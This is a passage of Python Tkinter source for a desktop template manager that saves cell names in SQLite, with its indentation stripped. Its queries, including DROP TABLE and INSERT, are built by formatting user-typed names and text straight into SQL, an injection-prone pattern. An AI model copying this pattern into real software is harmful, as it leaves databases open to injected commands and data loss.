self.men6.grab_release()
#popupmenu for the scatter graph plot function
def graph2(self):
x=self.men7.winfo_pointerx()
y=self.men7.winfo_pointery()
try:
self.men7.tk_popup(x,y,0)
finally:
self.men7.grab_release()
#popup menu for the bar graph menu function
def graph3(self):
x=self.men8.winfo_pointerx()
y=self.men8.winfo_pointery()
try:
self.men8.tk_popup(x,y,0)
finally:
self.men8.grab_release()
# Template creation function
def create(self):
self.c4.grid_remove()
self.back.grid_remove()
self.config.grid_remove()
#Template name Entry
self.entry=Entry(self.top,)
self.entry.insert(0,'New_Template')
self.terminate=Button(self.top,text='X')
self.entry.select_range(0,'end')
self.entry.focus_set()
self.entry.grid(row=3,column=0)
self.entry.bind('<Escape>',self.load3)
for i in range(len(list9)):
threading.Thread(target=list9[i].config(state='normal')).start()
threading.Thread(target=list9[i].delete(1.0,'end')).start()
self.xc1=Image.open(rb"C:\Users\PASCAL\Desktop\FES Project\project 1\clear.png")
self.xc1=self.xc1.resize((round(self.width/7.68),round(self.height/29.19)))
self.xc1=ImageTk.PhotoImage(self.xc1)
self.yc1=Image.open(rb"C:\Users\PASCAL\Desktop\FES Project\project 1\savet.png")
self.yc1=self.yc1.resize((round(self.width/7.68),round(self.height/29.19)))
self.yc1=ImageTk.PhotoImage(self.yc1)
try:
#Clear all button to erase all names
self.cle1=Button(self.test10,image=self.xc1,borderwidth=0,bd=0,bg='grey')
self.sav1=Button(self.test10,image=self.yc1,borderwidth=0,bd=0,command=self.create2)
self.cle1.grid(row=2,column=0,sticky='s')
self.sav1.grid(row=3,column=0,sticky='s')
self.ted.entryconfig('Create',state='disabled')
self.ted.entryconfig('Edit',state='disabled')
self.ted.entryconfig('Delete',state='disabled')
self.ted.entryconfig('Load',state='disabled')
finally:
self.ted.entryconfig('Create',label='Please Save The Template')
self.config_themes8()
def load3(self,event):
data=sqlite3.connect('data.db')
connet=data.cursor()
names=connet.execute("SELECT cells FROM {}".format(self.template.cget('text'))).fetchall()
for i in range(len(names)):
list9[i].config(state='normal')
list9[i].delete(1.0,'end')
list9[i].insert(1.0,names[i][0])
list9[i].config(state='disabled')
self.entry.grid_forget()
self.cle1.grid_forget()
self.sav1.grid_forget()
self.c4.grid()
self.config.grid()
self.back.grid()
self.ted.entryconfig('Please Save The Template',state='normal',label='Create')
self.ted.entryconfig('Edit',state='normal')
self.ted.entryconfig('Delete',state='normal')
self.ted.entryconfig('Load',state='normal')
def tryer(self,event):
self.frame.place(x=self.bi,y=self.bii)
print(self.bi,self.bii,'gh')
threading.Thread(target=self.frame.config(width=event.x,height=event.y)).start()
self.top.bind('<ButtonPress-1>',self.do)
print(self.frame.cget('width'),self.frame.cget('height'))
#curx,cury=(event.x,event.y)
#self.testy.coords(self.rect,self.widget_drag1,self.widget_drag2,curx,cury)
#if self.resize:
# if self.resize and self.hori:
# self.frame.config(width=event.x)
# if self.resize and self.vert:
# self.frame.config(height=event.y)
#else:
# cursor='size' if self.do2(event.x,event.y) else ''
# if cursor!=self.cursor:
# self.frame.config(cursor=cursor)
#def tryer1(self,event):
# pass
#def tryer(self,event):
# u=event.widget
# x=u.winfo_x()-self.widget_drag1+event.x
# y=u.winfo_y()-self.widget_drag2+event.y
# #u.place(x=x,y=y)
# u=event.widget.winfo_containing(event.x_root,event.y_root)
# if isinstance(u,Text):
# w,h=self.c.winfo_width(),self.c.winfo_height()
# print(w,h)
# print(event.y,'j')
# self.top.bind('<ButtonPress-1>',self.do)
# #self.top.bind('<keyP')
# if event.x>round(0.9*w):
# threading.Thread(target=self.c.xview_scroll(1,'units')).start()
# threading.Thread(target=self.c3.xview_scroll(1,'units')).start()
# threading.Thread(target=self.testf.xview_scroll(1,'units')).start()
# threading.Thread(target=u.config(bg='#EBA7A7')).start()
# elif event.x<round(0.9*w):
# threading.Thread(target=self.c.xview_scroll(-1,'units')).start()
# threading.Thread(target=self.c3.xview_scroll(-1,'units')).start()
# threading.Thread(target=self.testf.xview_scroll(-1,'units')).start()
# threading.Thread(target=u.config(bg='#EBA7A7')).start()
# if event.y>round(0.9*h):
# threading.Thread(target=self.c.yview_scroll(1,'units')).start()
# threading.Thread(target=self.c2.yview_scroll(1,'units')).start()
# threading.Thread(target=u.config(bg='#EBA7A7')).start()
# elif event.y<round(0.9*h):
# threading.Thread(target=self.c.yview_scroll(-1,'units')).start()
# threading.Thread(target=self.c2.yview_scroll(-1,'units')).start()
# threading.Thread(target=u.config(bg='#EBA7A7')).start()
# lgh.append(u)
def do(self,event):
self.frame.place_forget()
self.top.bind('<ButtonPress-1>',self.tryer1)
def do2(self,x,y):
wid,hei=self.frame.cget('width'),self.frame.cget('height')
mode=0
if x>wid-10: mode|=self.hori
if y>hei-10: mode|=self.vert
return mode
def tryer1(self,event):
self.hori=1
self.vert=2
self.resize=0
self.cursor=''
widget=event.widget
if isinstance(widget,Text):
self.bi=event.x_root
self.bii=event.y_root
self.top.bind('<B1-Motion>',self.tryer)
self.widget_drag1=event.x
self.widget_drag2=event.y
#self.rect=self.testy.create_rectangle(0,0,1,1, fill='brown')
self.frame=Canvas(self.top,bd=0,relief='raised',bg='brown',width=100,height=100)
#self.do2(self.widget_drag1,self.widget_drag2)
#Template creation checker
def create2(self):
checkers=[]
print(len(self.entry.get()))
#to check whether the template name is empty
if len(self.entry.get())==0:
self.error=showerror('Name Null','Template Name Null')
# to check wheather the tempate name is purely numbers
elif self.entry.get().isdigit():
self.error2=showerror("Name Null","Template Name\nCan't be Number")
#if it none of the above
else:
#opening of the data base
try:
data=sqlite3.connect('data.db')
connet=data.cursor()
res=connet.execute("SELECT name FROM sqlite_master WHERE type='table' ").fetchall()
# if there are no raised errors like table name already exist
connet.execute("""CREATE TABLE {}(cells TEXT,row1 TEXT,row2 TEXT,
row3 TEXT,row4 TEXT,row5 TEXT,row6 TEXT,row7 TEXT,row8 text)""".format(self.entry.get()))
for i in range(len(list9)):
connet.execute("INSERT INTO {}(cells) VALUES('{}')".format(self.entry.get(),list9[i].get(1.0,'end')))
list9[i].config(state='disabled')
self.entry.grid_forget()
self.cle1.grid_forget()
self.sav1.grid_forget()
self.c4.grid()
self.config.grid()
self.back.grid()
self.ted.entryconfig('Please Save The Template',state='normal',label='Create')
self.ted.entryconfig('Edit',state='normal')
self.ted.entryconfig('Delete',state='normal')
self.ted.entryconfig('Load',state='normal')
with open('loader.pk', 'wb') as f2:
self.data2=pickle.dump(self.entry.get(),f2)
self.template.config(text=self.entry.get())
data.commit()
data.close()
#if there is any error it raises a message box with confirmation wheather there should be overwritten of the table name
except sqlite3.OperationalError:
threading.Thread(target=PlaySound('SystemQuestion',SND_ASYNC)).start()
self.top12=Toplevel(self.top)
self.top12.resizable(0,0)
self.top12.attributes('-toolwindow',True)
self.top12.protocol('WM_DELETE_WINDOW',lambda:threading.Thread(target=PlaySound('SystemQuestion',SND_ASYNC)).start())
self.topframe=Frame(self.top12)
self.question=Label(self.topframe,text="Name '{}' Already Exists.\nDo You Want To Overwrite".format(self.entry.get()))
self.question.grid(row=0,column=0)
self.yes=Button(self.topframe,text='Yes',command=lambda answer='yes':self.message(answer))
self.yes.grid(row=1,column=0)
self.top12.bind('<Button-1>',self.flash)
self.top12.bind('<ButtonPress-1>',self.flash)
self.top12.bind('<Button-2>',self.flash)
self.top12.bind('<ButtonPress-2>',self.flash)
self.top12.bind('<Button-3>',self.flash)
self.top12.bind('<Button-4>',self.flash)
self.top12.bind('<Button-5>',self.flash)
self.no=Button(self.topframe,text='No',command=lambda answer='no':self.message(answer))
self.no.grid(row=1,column=1,padx=10)
self.top12.grab_set()
self.topframe.grid(row=0)
self.top12.focus_force()
#warning sound if try to shift focus away from the messagebox
def flash(self,event):
try:
if event.widget==self.top12:
self.top12.bell()
except AttributeError:
if event.widget==self.top17:
self.top17.bell()
#messagebox function to achieve the overwritting
def message(self,answer):
if answer=='yes':
try:
data=sqlite3.connect('data.db')
connet=data.cursor()
self.top12.grab_release()
self.top12.destroy()
connet.execute("DROP TABLE {}".format(self.entry.get()))
connet.execute("""CREATE TABLE {}(cells TEXT,row1 TEXT,row2 TEXT,row3 TEXT,
row4 TEXT,row5 TEXT,row6 TEXT,row7 TEXT,row8 text)""".format(self.entry.get()))
for i in range(len(list9)):
connet.execute("INSERT INTO {}(cells) VALUES('{}')".format(self.entry.get(),list9[i].get(1.0,'end')))
list9[i].config(state='disabled')
self.entry.grid_forget()
self.c4.grid()
self.cle1.grid_forget()
self.sav1.grid_forget()
self.back.grid()
self.config.grid()
self.ted.entryconfig('Please Save The Template',state='normal',label='Create')
self.ted.entryconfig('Create',state='normal')
self.ted.entryconfig('Delete',state='normal')
self.ted.entryconfig('Load',state='normal')
self.ted.entryconfig('Edit',state='normal')
with open('loader.pk', 'wb') as f2:
self.data2=pickle.dump(self.entry.get(),f2)
f2.close()
with open('loader.pk','rb') as f2:
data3=pickle.load(f2)
self.template.config(text=data3)
data.commit()
data.close()
except AttributeError:
data=sqlite3.connect('data.db')
connet=data.cursor()
self.top17.grab_release()
self.top17.destroy()
connet.execute("DROP TABLE {}".format(self.entry2.get()))
connet.execute("""CREATE TABLE {}(cells TEXT,row1 TEXT,row2 TEXT,row3 TEXT,
row4 TEXT,row5 TEXT,row6 TEXT,row7 TEXT,row8 text)""".format(self.entry2.get()))
for i in range(len(list9)):
connet.execute("INSERT INTO {}(cells) VALUES('{}')".format(self.entry2.get(),list9[i].get(1.0,'end')))
list9[i].config(state='disabled')
self.cle2.grid_forget()
self.sav2.grid_forget()
self.entry2.grid_forget()
self.c4.grid()
self.back.grid()
self.config.grid()
self.ted.entryconfig('Please Save The Template',state='normal',label='Edit')
self.ted.entryconfig('Create',state='normal')
self.ted.entryconfig('Delete',state='normal')
self.ted.entryconfig('Load',state='normal')
with open('loader.pk', 'wb') as f2:
self.data2=pickle.dump(self.entry2.get(),f2)
f2.close()
connet.execute("DROP TABLE {}".format(self.value[self.value.index(' ')+2:]))
with open('loader.pk','rb') as f2:
data3=pickle.load(f2)
self.template.config(text=data3)
data.commit()
data.close()
if answer=='no':
try:
self.entry.focus_set()
self.top12.grab_release()
self.top12.destroy()
except AttributeError:
self.entry2.focus_set()
self.top17.grab_release()
self.top17.destroy()
#load function to load already created templates
def load(self):
self.top13=Toplevel(self.top)
self.top13.protocol('WM_DELETE_WINDOW',self.burst)
mwidth=self.top13.winfo_screenwidth()
mheight=self.top13.winfo_screenheight()
xwidth1=round(mwidth/2.3)
yheight1=round(mheight/2.3)
self.top13.geometry('{}x{}+{}+{}'.format(xwidth1,yheight1,round((mwidth/2)-(xwidth1/2)),round((mheight/2)-(yheight1/2))))
self.top13.resizable(0,0)
self.top13.grab_set()
self.top13.attributes('-toolwindow',True)
data=sqlite3.connect('data.db')
connet=data.cursor()
style=ttk.Style()
style.configure('mystyle.Treeview',highlightthickness=0,bd=0,font=('Calibri',11),rowheight=35,)
style.configure('mystyle.Treeview.Heading',font=('Calibri',13,'bold'))
style.layout('mystyle.Treeview',[('mystyle.Treeview.treearea',{'sticky':'nswe'})],)
style.configure('mystyle.Treeview',background='black')
images=Image.open(rb"C:\Users\PASCAL\Desktop\FES Project\project 1\templ.png")
images=images.resize((25,25))
images=ImageTk.PhotoImage(images)
self.loadframe=Frame(self.top13)
#listbox that contains the template names
self.loadlist=ttk.Treeview(self.loadframe,columns=('#0','#1','#2'),style='mystyle.Treeview')
self.loadlist.heading('#0',text='Names',anchor='center')
self.loadlist.heading('#1',text='Date Created',anchor='center')
self.loadlist.heading('#2',text='Last Modified',anchor='center')
self.loadlist.column('#0',minwidth=300,width=300)
self.loadlist.column('#1',minwidth=190,width=190)
self.loadlist.column('#2',minwidth=190,width=190)
self.loadscroll=Scrollbar(self.loadframe,orient='horizontal')
self.loadscroll1=Scrollbar(self.loadframe,orient='vertical')
res=connet.execute("SELECT name FROM sqlite_master WHERE type='table' ").fetchall()
for i in range(len(res)):
self.loadlist.insert('',f'{i}',f'{i}',text=('{}'.format(res[i][0])),values=(0,10),image=images)
self.loadlist.images=images
self.loadlist.grid(row=0,column=0)
self.loadscroll.config(command=self.loadlist.xview)
self.loadscroll1.config(command=self.loadlist.yview)
self.loadscroll.grid(row=1,column=0,sticky='ew')
self.loadscroll1.grid(row=0,column=2,sticky='ns')
self.loadlist.config(xscrollcommand=self.loadscroll.set,yscrollcommand=self.loadscroll1.set)
self.loadlist.grid_propagate(False)
self.loadlist.focus_set()
self.top13.bind('<Button-1>',self.flash2)
self.top13.bind('<ButtonPress-1>',self.flash2)
self.top13.bind('<Button-2>',self.flash2)
self.top13.bind('<ButtonPress-2>',self.flash2)
self.top13.bind('<Button-3>',self.flash2)
self.top13.bind('<Button-4>',self.flash2)
self.top13.bind('<Button-5>',self.flash2)
self.loadframe.grid(row=0,column=0)
with open('loader.pk','rb') as f2:
data3=pickle.load(f2)
#indexer=list(self.loadlist.get(0,'end')).index('{} {}'.format('::::',data3,))
#self.loadlist.selection_set(indexer)
#self.loadlist.see(indexer)
#listbox selection binding
self.loadlist.bind('<<TreeviewSelect>>',self.load2)
self.loadlist.bind('<Button-3>',self.popup)
#load listbox selection function
def load2(self,event):
try:
self.top13.grab_set()
sel=self.loadlist.selection()
if sel:
selc=self.loadlist.item(sel)
self.value=selc['text']
print(selc['text'])
except AttributeError:
sel=self.loadlist.selection()
self.value=self.loadlist.get(sel[0])
with open('loader.pk', 'wb') as f2:
self.data2=pickle.dump(self.value,f2)
f2.close()
data=sqlite3.connect('data.db')
connet=data.cursor()
names=connet.execute("SELECT cells FROM {}".format(self.value)).fetchall()
#if the length of the template is 0 it ask to edit the template
if len(names)==0:
self.top13.grab_release()
threading.Thread(target=self.top13.bell).start()
self.top14=Toplevel(self.top)
self.top14.resizable(0,0)
self.top14.focus_force()
self.top14.grab_set()
self.top14.attributes('-toolwindow',True)
self.top14.title('Name Null')
self.top14.protocol('WM_DELETE_WINDOW',self.erexit)
self.topframe2=Frame(self.top14)
self.question1=Label(self.topframe2,text="Template ({}) is empty, Do You Wish to Edit? ".format(self.value))
self.question1.grid(row=0,column=0)
self.yes1=Button(self.topframe2,text='Yes',command=lambda answer='yes',answer2='null':self.message2(answer,answer2))
self.yes1.grid(row=1,column=0)
self.top14.bind('<Button-1>',self.flash3)
self.top14.bind('<ButtonPress-1>',self.flash3)
self.top14.bind('<Button-2>',self.flash3)
self.top14.bind('<ButtonPress-2>',self.flash3)
self.top14.bind('<Button-3>',self.flash3)
self.top14.bind('<Button-4>',self.flash3)
self.top14.bind('<Button-5>',self.flash3)
self.no1=Button(self.topframe2,text='No',command=lambda answer='no',answer2='null':self.message2(answer,answer2))
self.no1.grid(row=1,column=1,padx=3)
self.topframe2.grid(row=0)
else:
self.top13.grab_set()
for i in range(len(names)):
list9[i].config(state='normal')
list9[i].delete(1.0,'end')
list9[i].insert(1.0,names[i][0])
list9[i].config(state='disabled')
##exiting the confirmation messagebox
def burst(self):
with open('loader.pk','rb') as f2:
data3=pickle.load(f2)
self.template.config(text=data3)
self.top.focus_force()
self.top13.grab_release()
self.top13.destroy()
def erexit(self):
self.top14.destroy()
self.top13.grab_set()
#warning sound if tried to shift focus away from the messagebox
def flash2(self,event):
if self.top13.winfo_containing(event.x_root,event.y_root)!=self.top13 and event.widget!=self.loadscroll1 and event.widget!=self.loadscroll and event.widget!=self.loadlist:
self.top13.bell()
#warning sound if tried to shift focus away from the messagebox
def flash3(self,event):
try:
if event.widget==self.top14:
self.top14.bell()
except:
if event.widget==self.top18:
self.top18.bell()
#fuction to achieve the answers to edit or not
def message2(self,answer,answer2):
if answer=='no':
self.top14.grab_release()
self.top14.destroy()
self.top13.grab_set()
self.top13.focus_force()
if answer=='yes':
try:
self.top.focus_force()
self.top14.grab_release()
self.top14.destroy()
self.top13.destroy()
except AttributeError:
self.top.focus_force()
self.top13.destroy()
data=sqlite3.connect('data.db')
connet=data.cursor()
names=connet.execute("SELECT cells FROM {}".format(self.value)).fetchall()
self.c4.grid_remove()
self.back.grid_remove()
self.config.grid_remove()
self.entry2=Entry(self.top,)
self.entry2.insert(0,self.value)
self.entry2.select_range(0,'end')
self.entry2.focus_set()
self.entry2.grid(row=3,column=0)
for ik in range(len(names)):
list9[ik].config(state='normal')
list9[ik].delete(1.0,'end')
list9[ik].insert(1.0,names[ik][0])
list9[ik].config(state='disabled')
for i in range(len(list9)):
threading.Thread(target=list9[i].config(state='normal')).start()
self.xc2=Image.open(rb"C:\Users\PASCAL\Desktop\FES Project\project 1\clear.png")
self.xc2=self.xc2.resize((round(self.width/7.68),round(self.height/29.19)))
self.xc2=ImageTk.PhotoImage(self.xc2)
self.yc2=Image.open(rb"C:\Users\PASCAL\Desktop\FES Project\project 1\savet.png")
self.yc2=self.yc2.resize((round(self.width/7.68),round(self.height/29.19)))
self.yc2=ImageTk.PhotoImage(self.yc2)
try:
self.cle2=Button(self.test10,image=self.xc2,borderwidth=0,bd=0,bg='grey')
self.sav2=Button(self.test10,image=self.yc2,borderwidth=0,bd=0,command=self.edit2)
self.cle2.grid(row=2,column=0,sticky='s')
self.sav2.grid(row=3,column=0,sticky='s')
self.ted.entryconfig('Edit',state='disabled')
self.ted.entryconfig('Create',state='disabled')
self.ted.entryconfig('Delete',state='disabled')
self.ted.entryconfig('Load',state='disabled')
finally:
self.ted.entryconfig('Edit',label='Please Save The Template')
#saving the template which was edited
def edit2(self):
data=sqlite3.connect('data.db')
connet=data.cursor()
confirm=connet.execute("SELECT name FROM sqlite_master WHERE type='table' AND name='{}'".format(self.entry2.get())).fetchone()
#testing wheather if there are errors
try:
#testing wheather the name is empty
if len(self.entry2.get())==0:
self.error6=showerror('Name Null','Template Name Null')
#Testing wheter the name is number
elif self.entry2.get().isdigit():
self.error7=showerror("Name Null","Template Name\nCan't be Number")
#testing wheather there the template highlighted match with the one inside the database if any changes is done to the previous name
#Also if the name edited match with any table name on the database it raises an error to overwrite the table or not
elif confirm[0]!=self.value[self.value.index(' ')+2:] and len(confirm)>0:
self.top17=Toplevel(self.top)
self.top17.resizable(0,0)
self.top17.attributes('-toolwindow',True)
self.top17.protocol('WM_DELETE_WINDOW',lambda:threading.Thread(target=PlaySound('SystemQuestion',SND_ASYNC)).start())
self.topframe2=Frame(self.top17)
self.question3=Label(self.topframe2,text="Name '[{}]' Already Exists.\nClick [Yes] To overwrite, Click [No] To Cancel".format(self.entry2.get()))
self.question3.grid(row=0,column=0)
self.yes3=Button(self.topframe2,text='Yes',command=lambda answer='yes':self.message(answer))
self.yes3.grid(row=1,column=0)
self.top17.bind('<Button-1>',self.flash)
self.top17.bind('<ButtonPress-1>',self.flash)
self.top17.bind('<Button-2>',self.flash)
self.top17.bind('<ButtonPress-2>',self.flash)
self.top17.bind('<Button-3>',self.flash)
self.top17.bind('<Button-4>',self.flash)
self.top17.bind('<Button-5>',self.flash)
self.no3=Button(self.topframe2,text='No',command=lambda answer='no':self.message(answer))
self.no3.grid(row=1,column=1,padx=10)
self.top17.grab_set()
self.topframe2.grid(row=0)
self.top17.focus_force()
#if the table does exists like no changes made to the name of the template
else:
connet.execute("DELETE FROM {}".format(self.entry2.get()))
for i in range(len(list9)):
connet.execute("INSERT INTO {}(cells) VALUES('{}')".format(self.entry2.get(),list9[i].get(1.0,'end')))
list9[i].config(state='disabled')
self.entry2.grid_forget()
self.cle2.grid_forget()
self.sav2.grid_forget()
self.c4.grid()
self.config.grid()
self.back.grid()
self.ted.entryconfig('Please Save The Template',state='normal',label='Edit')
self.ted.entryconfig('Edit',state='normal')
self.ted.entryconfig('Create',state='normal')
self.ted.entryconfig('Delete',state='normal')
self.ted.entryconfig('Load',state='normal')
with open('loader.pk','rb') as f2:
data3=pickle.load(f2)
self.template.config(text=data3)
data.commit()
data.close()
#deleting the previous table if the name has been changed to a new one that
#is not on the database before in the database automatically
except TypeError:
data=sqlite3.connect('data.db')
connet=data.cursor()
#deleting the table which once formally selcted to be deleted while the name has been changed to a new one
connet.execute("DROP TABLE {}".format(self.value[self.value.index(' ')+2:]))
connet.execute("""CREATE TABLE {}(cells TEXT,row1 TEXT,row2 TEXT,row3 TEXT,
row4 TEXT,row5 TEXT,row6 TEXT,row7 TEXT,row8 text)""".format(self.entry2.get()))
for i in range(len(list9)):
connet.execute("INSERT INTO {}(cells) VALUES('{}')".format(self.entry2.get(),list9[i].get(1.0,'end')))
list9[i].config(state='disabled')
self.entry2.grid_forget()
self.c4.grid()
self.cle2.grid_forget()
self.sav2.grid_forget()
self.back.grid()
self.config.grid()
self.ted.entryconfig('Please Save The Template',state='normal',label='Edit')
self.ted.entryconfig('Create',state='normal')
self.ted.entryconfig('Delete',state='normal')
self.ted.entryconfig('Load',state='normal')
with open('loader.pk', 'wb') as f2:
self.data2=pickle.dump(self.entry2.get(),f2)
self.template.config(text=self.entry2.get())
data.commit()
data.close()
def flash4(self,event):
if event.widget==self.top16:
self.top16.bell()
#confirming the message box answers of deletion of templates
def message3(self,answer):
#if the answer is yes it droped the table from the database and remove the listbox and activate the upper table(Template)
if answer=='yes':
data=sqlite3.connect('data.db')
connet=data.cursor()
self.top18.grab_release()
self.top18.destroy()
connet.execute("DROP TABLE {}".format(self.value[self.value.index(' ')+2:]))
indexer=list(self.loadlist.get(0,'end')).index('{} {}'.format('::::',self.value[self.value.index(' ')+2:],))
self.loadlist.delete(indexer)
try:
indexe=self.loadlist.get(indexer-1)
#pickling the upper template for loading references
with open('loader.pk', 'wb') as f2:
self.data2=pickle.dump(self.value[indexe.index(' ')+2:],f2)
f2.close()
self.loadlist.selection_clear(0,'end')
self.loadlist.selection_set(indexer-1)
self.loadlist.see(indexer-1)
self.loadlist.activate(indexer-1)
self.loadlist.selection_anchor(indexer-1)
#calling the load2 fuction to activate the upper template
self.load2('l')
data.commit()
data.close()
self.top13.grab_set()
except ValueError:
indexe=self.loadlist.get(0)
#pickling the upper template for loading references
with open('loader.pk', 'wb') as f2:
self.data2=pickle.dump(self.value[indexe.index(' ')+2:],f2)
f2.close()
self.loadlist.selection_clear(0,'end')
self.loadlist.selection_set(0)
self.loadlist.see(0)
self.loadlist.activate(0)
self.loadlist.selection_anchor(0)
#calling the load2 fuction to activate the upper template
self.load2('l')
data.commit()
data.close()
self.top13.grab_set()
if answer=='no':
self.top18.grab_release()
self.top18.destroy()
self.top13.grab_set()
#deletion fuction when clicked
def delete(self):
self.top18=Toplevel(self.top)
self.top18.bell()
self.top18.resizable(0,0)
self.top18.attributes('-toolwindow',True)
self.top18.protocol('WM_DELETE_WINDOW',lambda:threading.Thread(target=PlaySound('SystemQuestion',SND_ASYNC)).start())
self.topframe3=Frame(self.top18)
self.question4=Label(self.topframe3,
text="Do You Want To Proceed To Delete The Template ({}).\nClick [Yes] To overwrite, Click [No] To Cancel".format(self.value[self.value.index(' ')+2:]))
self.question4.grid(row=0,column=0)
self.yes4=Button(self.topframe3,text='Yes',command=lambda answer='yes':self.message3(answer))
self.yes4.grid(row=1,column=0)
self.top18.bind('<Button-1>',self.flash3)
self.top18.bind('<ButtonPress-1>',self.flash3)
self.top18.bind('<Button-2>',self.flash3)
self.top18.bind('<ButtonPress-2>',self.flash3)
self.top18.bind('<Button-3>',self.flash3)
self.top18.bind('<Button-4>',self.flash3)
self.top18.bind('<Button-5>',self.flash3)
self.no4=Button(self.topframe3,text='No',command=lambda answer='no':self.message3(answer))
self.no4.grid(row=1,column=1)
self.top18.grab_set()
self.topframe3.grid(row=0)
self.top18.focus_force()
#popop while right clicking the listbox item to achieve some internal fuctions
def popup(self,event):
self.loadlist.selection_set(self.loadlist.identify_row(event.y))
#self.loadlist.activate(self.loadlist.nearest(event.y))
sel=self.loadlist.selection()
selc=self.loadlist.item(sel)
self.value=selc['text']
with open('loader.pk', 'wb') as f2:
self.data2=pickle.dump(self.value,f2)
self.men10=Menu(self.top13,tearoff=0,bg='black',activebackground='white',
activeforeground='black',font=('Time',10),fg='white',activeborderwidth=0,bd=0,relief=FLAT)
self.men10.add_cascade(label='Template: {}'.format(self.value))
self.men10.add_separator()
self.men10.add_command(label='Edit ({})'.format(self.value),
command=lambda answer='yes',answer2='null':self.message2(answer,answer2))
self.men10.add_separator()
self.men10.add_command(label='Delete ({})'.format(self.value),command=self.delete)
self.men10.add_separator()
self.men10.add_command(label='Properties')
self.popup1(event.x_root,event.y_root)
def popup1(self,x,y):
try:
self.men10.tk_popup(x,y)
finally:
self.men10.grab_release()
def change(self):
self.xc=Image.open(rb"C:\Users\PASCAL\Desktop\FES Project\project 1\clear.png")
self.xc=self.xc.resize((round(self.width/7.68),round(self.height/29.19)))
self.xc=ImageTk.PhotoImage(self.xc)
self.yc=Image.open(rb"C:\Users\PASCAL\Desktop\FES Project\project 1\save.png")
self.yc=self.yc.resize((round(self.width/7.68),round(self.height/29.19)))
self.yc=ImageTk.PhotoImage(self.yc)
self.back.grid_forget()
self.config.grid_forget()
try:
for i in range(len(list9)):
list9[i].config(state='normal')
self.cle=Button(self.test10,image=self.xc,borderwidth=0,bd=0,bg='grey',command=self.change2)
self.sav=Button(self.test10,image=self.yc,borderwidth=0,bd=0,command=self.change1)
self.cle.grid(row=2,column=0,sticky='s')
self.sav.grid(row=3,column=0,sticky='s')
self.ted.entryconfig('Edit',state='disabled')
finally:
self.ted.entryconfig('Edit',label='Please Save The Template')
self.config_themes7()
#function to save the cell rows name in the data base (data.db)
def change1(self):
data=sqlite3.connect('data.db')
connet=data.cursor()
self.names=connet.execute("SELECT cells FROM data").fetchall()
self.ted.entryconfig('Please Save The Template',state='normal',label='Create')
self.config.grid(row=1,column=0)
self.back.grid(row=2,column=0)
self.sav.grid_forget()
self.cle.grid_forget()
#condition whereby the cell row names are still void
if len(self.names)==0:
for i in range(len(list9)):
connet.execute("INSERT INTO data(cells) VALUES('{}')".format(list9[i].get(1.0,'end')))
list9[i].config(state='disabled')
data.commit()
data.close()
#condition whreby the cell row names are updated
else:
connet.execute("DELETE FROM data")
for i in range(len(list9)):
connet.execute("INSERT INTO data(cells) VALUES('{}')".format(list9[i].get(1.0,'end')))
list9[i].config(state='disabled')
data.commit()
data.close()
def change2(self):
for i in range(len(list9)):
list9[i].delete(1.0,'end')
#settings menu function
def bind(self):
self.top5=Toplevel()
self.top5.config(bg='white')
self.top5.resizable(0,0)
self.top5.grab_set()
self.top5.focus_set()
self.xwidth=self.top5.winfo_screenwidth()
self.yheight=self.top5.winfo_screenheight()
self.gwidth=round(self.top5.winfo_screenwidth()/2.09)
self.gheight=round(self.top5.winfo_screenheight()/1.32)
self.top5.geometry('{}x{}+{}+{}'.format(self.gwidth,self.gheight,round((self.xwidth/2)-(self.gwidth/2)),
round((self.yheight/2)-(self.gheight/2))))
self.top5.attributes('-toolwindow',True)
list_frame=Frame(self.top5)
self.frame=Frame(self.top5)
self.frame2=Frame(self.top5)
self.frame3=Frame(self.top5,bd=0,borderwidth=0,bg='white')
self.hc=Canvas(self.top5,width=round(self.xwidth/2.18))
self.frame4=Frame(self.hc,width=round(self.xwidth/2.26))
self.hsc=Scrollbar(self.top5,orient='vertical')
self.hsc1=Scrollbar(self.top5,orient='horizontal')
string=StringVar()
string.set('Row')
self.option=Listbox(list_frame,width=round(self.xwidth/24),height=round(self.yheight/154.29),
font=('Helvectica',10))
self.b=['Security','Themes','Configure Functions','How it Works','About','Support And Donation',
'Restore App To Factory State']
for c in self.b:
self.option.insert('end',c)
self.option.grid(row=1,column=0,sticky='ns')
list_frame.grid(row=1,column=0,sticky='w')
self.option.bind('<<ListboxSelect>>',self.pri)
self.option.selection_set(0)
self.option.see(0)
self.security()
self.config_themes2()
def pri(self,event):
wid=event.widget
sel=wid.curselection()
value=wid.get(sel[0])
#conditon if any of the settings menu is selected it returns back the actual menu
if value=='Themes':
self.themes()
if value=='Security':
self.security()
if value=='Configure Functions':
self.cf()
if value=='How it Works':
self.hiw()
if value=='About':
self.about()
if value=='Support And Donation':
self.sad()
if value=='Restore App To Factory State':
self.ras()
def themes(self):
self.hsc.grid_forget()
self.hsc1.grid_forget()
self.hc.grid_forget()
self.frame3.grid_forget()
self.frame.grid(row=4,column=0,sticky='w')
white=Image.open(r"C:\Users\PASCAL\Desktop\FES Project\project 1\white.png")
white=white.resize((round(self.xwidth/4.8),round(self.yheight/10.8)))
white=ImageTk.PhotoImage(white)
ash=Image.open(r"C:\Users\PASCAL\Desktop\FES Project\project 1\ashes.png")
ash=ash.resize((round(self.xwidth/4.8),round(self.yheight/10.8)))
ash=ImageTk.PhotoImage(ash)
blue=Image.open(r"C:\Users\PASCAL\Desktop\FES Project\project 1\dark blue.png")
blues=blue.resize((round(self.xwidth/4.8),round(self.yheight/10.8)))
blue=ImageTk.PhotoImage(blues)
black=Image.open(r"C:\Users\PASCAL\Desktop\FES Project\project 1\Black.png")
black=black.resize((round(self.xwidth/4.8),round(self.yheight/10.8)))
black=ImageTk.PhotoImage(black)
self.cha=Label(self.frame,text='Choose your desire your Theme',font=('Time',round(self.xwidth/160),'bold'),borderwidth=0,bd=0,
fg='black')
self.cha.grid(row=2,column=0,sticky='w')
#changing of theme and backgrounds including text colors etc
first_color=Label(self.frame,image=ash,font=('helvectica',13,'bold'),bg='grey').grid(row=3,column=0,sticky='w')
second_color=Label(self.frame,image=black,font=('helvectica',13,'bold'),bg='black').grid(row=4,column=0,sticky='w')
third_color=Label(self.frame,image=blue,font=('helvectica',13,'bold'),bg='#151930').grid(row=5,column=0,sticky='w')
forth_color=Label(self.frame,image=white,font=('helvectica',13,'bold'),bg='white').grid(row=6,column=0,sticky='w')
self.va1=IntVar()
with open('check.pkl','rb') as f1:
data=pickle.load(f1)
self.va1.set(data)
var1=Checkbutton(self.frame,text='',var=self.va1,onvalue=1,bd=1,borderwidth=0,command=self.config_themes).grid(row=3,column=2,sticky='w')
